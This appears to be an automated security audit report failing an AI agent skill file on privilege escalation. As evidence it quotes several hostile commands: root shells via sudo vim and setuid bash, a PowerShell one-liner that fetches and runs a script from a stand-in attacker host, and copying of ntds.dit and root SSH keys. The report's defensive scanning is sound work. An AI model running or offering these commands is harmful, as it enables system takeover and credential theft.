Privilege Escalation Methods

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE)
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill provides numerous commands specifically designed to elevate privileges by exploiting system misconfigurations.
      • Evidence: Linux commands like sudo vim -c ':!/bin/bash' and chmod +s /bin/bash in SKILL.md are used to gain root access.
      • Evidence: Windows commands like Invoke-ServiceAbuse and ExploitCapcom.exe target service and driver vulnerabilities.
  • REMOTE_CODE_EXECUTION (HIGH): The skill includes patterns for downloading and executing remote scripts in a single step.
      • Evidence: powershell.exe -c 'iex (iwr http://attacker/shell.ps1)' in the Golden Ticket persistence section of SKILL.md uses Invoke-Expression with Invoke-WebRequest to run remote code.
  • DATA_EXFILTRATION (HIGH): The skill contains instructions for accessing and copying highly sensitive files that store system identities and credentials.
      • Evidence: Commands in SKILL.md demonstrate how to copy ntds.dit (Active Directory database) and the SYSTEM hive using SeBackupPrivilege and Volume Shadow Copy (vssadmin).
      • Evidence: Usage of tar to access and copy private SSH keys from /root/.ssh/id_rsa via capability abuse.
  • CREDENTIALS_UNSAFE (MEDIUM): The skill provides methodologies for harvesting and dumping credentials from memory and network traffic.
      • Evidence: Specific instructions for using mimikatz to perform DCSync attacks and Responder for LLMNR poisoning.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 17, 2026, 04:31 PM